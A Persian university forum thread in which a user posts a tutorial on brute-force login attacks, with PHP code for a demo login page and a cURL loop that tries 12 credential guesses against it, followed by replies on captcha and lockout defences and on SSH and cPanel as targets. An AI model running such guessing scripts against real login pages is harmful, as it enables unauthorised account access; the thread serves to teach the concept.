نمایش نتایج: از شماره 1 تا 5 از مجموع 5
Like Tree5نفر پسندیدند
  • 4 ارسال توسط Codex
  • 1 ارسال توسط Codex

موضوع: bruteforce به همراه اسکریپت حمله به سایتها ....

  1. #1
    کاربر عادی
    تاریخ عضویت
    2011 May
    محل سکونت
    تهران
    ارسال ها
    316
    تشکر
    37
    تشکر شده 688 بار در 303 پست
    نوشته های وبلاگ
    39


    آيا اين پست براي شما سودمند بود؟ بله | خیر

    bruteforce به همراه اسکریپت حمله به سایتها ....

    با سلام
    طبق قولی که به یکی از کاربران داده بودم این نوع حمله رو به همراه اسکریپت و بصورت عملی توضیح میدم

    توضیح اجمالی: bruteforce به معنای آزمون خطاست و در حمله به سایت ها یعنی اینقدر یوزر پس چک میکنیم تا درست از آب در بیاد.

    نکته: تمامی فایلهایی که اینجا گفته میشه رو تو یه فولدر بریزین.

    ابتدا صفحه ای به اسم login-attack.php ایجاد کنید و کد زیر را در آن قرار دهید:
    کد PHP:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
      <title>Hello!</title>
    </head>
    <body>
    <?php
        
    if(isset($_POST['submit'])){
            if(
    $_POST['username'] == 'mohsen' && $_POST['pass'] == 'soltani'){
                echo 
    'yes';
            }else{
                echo 
    'no';
            }
        }
    ?>
    <form name="frm1" action="login-attack.php" method="post">
    username:<input type="textbox" name="username"  /><br />
    password:<input type="password" name="pass"  /><br />
    <input type="submit" name="submit" Value="login"  />
    </form>
    </body>
    </html>

    این کد یک صفحه لاگینه که قراره بهش حمله کنیم

    اسکریپت حمله:
    از CURL استفاده میکنیم، برای راحتی کار توابع CURL رو در یک فایل جدا قرار میدیم و include میکنیم پس یک فایل به اسم brute_attack.php ایجاد کنید و کدهای زیر را در آن قرار دهید:
    کد PHP:
    <?php
        
    function attack($url,$post){
            
    $ch curl_init();
            
    curl_setopt($ch,CURLOPT_URL,$url);
            
    curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
            
    curl_setopt($chCURLOPT_SSL_VERIFYPEERFALSE);
            
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
            
    $res curl_exec($ch);
            
    curl_close($ch);
            return 
    $res;
        }
    ?>
    حالا یک فایل دیگر به اسم master-attack.php رو ایجاد میکنیم و کدهای زیر را در آن قرار میدهیم:
    کد PHP:
    <?php
        
    include("brute-attack.php");
        
    $url "Your-address";
        @
    apache_setenv('no-gzip'1);
        @
    ini_set('zlib.output_compression'0);
        @
    ini_set('implicit_flush'1);
        for (
    $i 0$i 12$i++) {
            
    $user .= '1';
            
    $pass .= '1';
            
    $post "submit=submit&username=$user&pass=$pass";
            echo 
    "with : username='$user'  password='$pass' ===>result : ".(strpos(attack($url,$post),'yes') > 'yes' 'no')."<br />";
            
    ob_end_flush();
            
    sleep(1);
        }
        
    ob_implicit_flush(1);
    ?>
    جای your-address آدرس اونجایی که login-attack.php در لوکال هاستتون هست رو قرار بدین، حالا master-attack.php رو اجرا کنید.
    این اسکریپت 12 بار یوزر پس را چک میکنه و ریزالت را بهتون نشون میده
    در پست بعدی خط به خط مواردو توضیح میدم.


    موضوعات مشابه:
    Hossein, Pouya, saeed3715 و 1 نفر دیگر این نویسه را می پسندند.
    http://payline.ir

    http://flynet.ir

    the poor people are often the most generous

  2. #2
    بنیانگذار
    تاریخ عضویت
    2010 January
    محل سکونت
    زیر سایه خدا
    سن
    37
    ارسال ها
    1,308
    تشکر
    2,923
    تشکر شده 2,205 بار در 886 پست
    نوشته های وبلاگ
    37


    آيا اين پست براي شما سودمند بود؟ بله | خیر
    اگه کپچا باشه این دیگه عمل نمیکنه درسته ؟ و همینطور محدودیت تعداد لاگین اشتباه ؟
    راه های مقابله با این حملات رو هم بگی خیلی عالی میشه

    توکل بخدا
    http://DeepLearning.ir
    اولین و تنها مرجع یادگیری عمیق ایران


    هرکس از ظن خود شد یار من
    از درون من نجست اسرار من




  3. #3
    کاربر عادی
    تاریخ عضویت
    2011 May
    محل سکونت
    تهران
    ارسال ها
    316
    تشکر
    37
    تشکر شده 688 بار در 303 پست
    نوشته های وبلاگ
    39


    آيا اين پست براي شما سودمند بود؟ بله | خیر
    درسته برای web app میشه راحت جلوی این حملات رو گرفت
    مثل گذاشتن captcha البته نه captcha سایت دانشگاه ! اون captcha رو میشه با روش dictionary دور زد

    من مثال php زدم تا با مفهوم و نحوه کار آشنا بشین، این حملات بیشتر برای SSH کاربرد داره ، چون دیگه اونجا captcha و ... در کار نیست
    برای DA و CP هم فکر کنم کاربرد داشته باشه و حتی برای application های تحت ویندوز

    http://payline.ir

    http://flynet.ir

    the poor people are often the most generous

  4. #4
    بنیانگذار
    تاریخ عضویت
    2010 January
    محل سکونت
    زیر سایه خدا
    سن
    37
    ارسال ها
    1,308
    تشکر
    2,923
    تشکر شده 2,205 بار در 886 پست
    نوشته های وبلاگ
    37


    آيا اين پست براي شما سودمند بود؟ بله | خیر
    نقل قول نوشته اصلی توسط codex نمایش پست ها
    برای da و cp هم فکر کنم کاربرد داشته باشه و حتی برای application های تحت ویندوز
    da و cp چیه ؟

    توکل بخدا
    http://DeepLearning.ir
    اولین و تنها مرجع یادگیری عمیق ایران


    هرکس از ظن خود شد یار من
    از درون من نجست اسرار من




  5. #5
    کاربر عادی
    تاریخ عضویت
    2011 May
    محل سکونت
    تهران
    ارسال ها
    316
    تشکر
    37
    تشکر شده 688 بار در 303 پست
    نوشته های وبلاگ
    39


    آيا اين پست براي شما سودمند بود؟ بله | خیر
    Direct Admin
    Cpanel

    Hossein این نویسه را میپسندد.
    http://payline.ir

    http://flynet.ir

    the poor people are often the most generous

 

 

کاربران برچسب خورده در این موضوع

علاقه مندی ها (Bookmarks)

علاقه مندی ها (Bookmarks)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •  


Powered by vBulletin
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.6.0
Persian Language By Ustmb.ir
این انجمن کاملا مستقل بوده و هیچ ارتباطی با دانشگاه علوم و فنون مازندران و مسئولان آن ندارد..این انجمن و تمامی محتوای تولید شده در آن توسط دانشجویان فعلی و فارغ التحصیل ادوار گذشته این دانشگاه برای استفاده دانشجویان جدید این دانشگاه و جامعه دانشگاهی کشور فراهم شده است.لطفا برای اطلاعات بیشتر در رابطه با ماهیت انجمن با مدیریت انجمن ارتباط برقرار کنید
ساعت 12:02 AM بر حسب GMT +4 می باشد.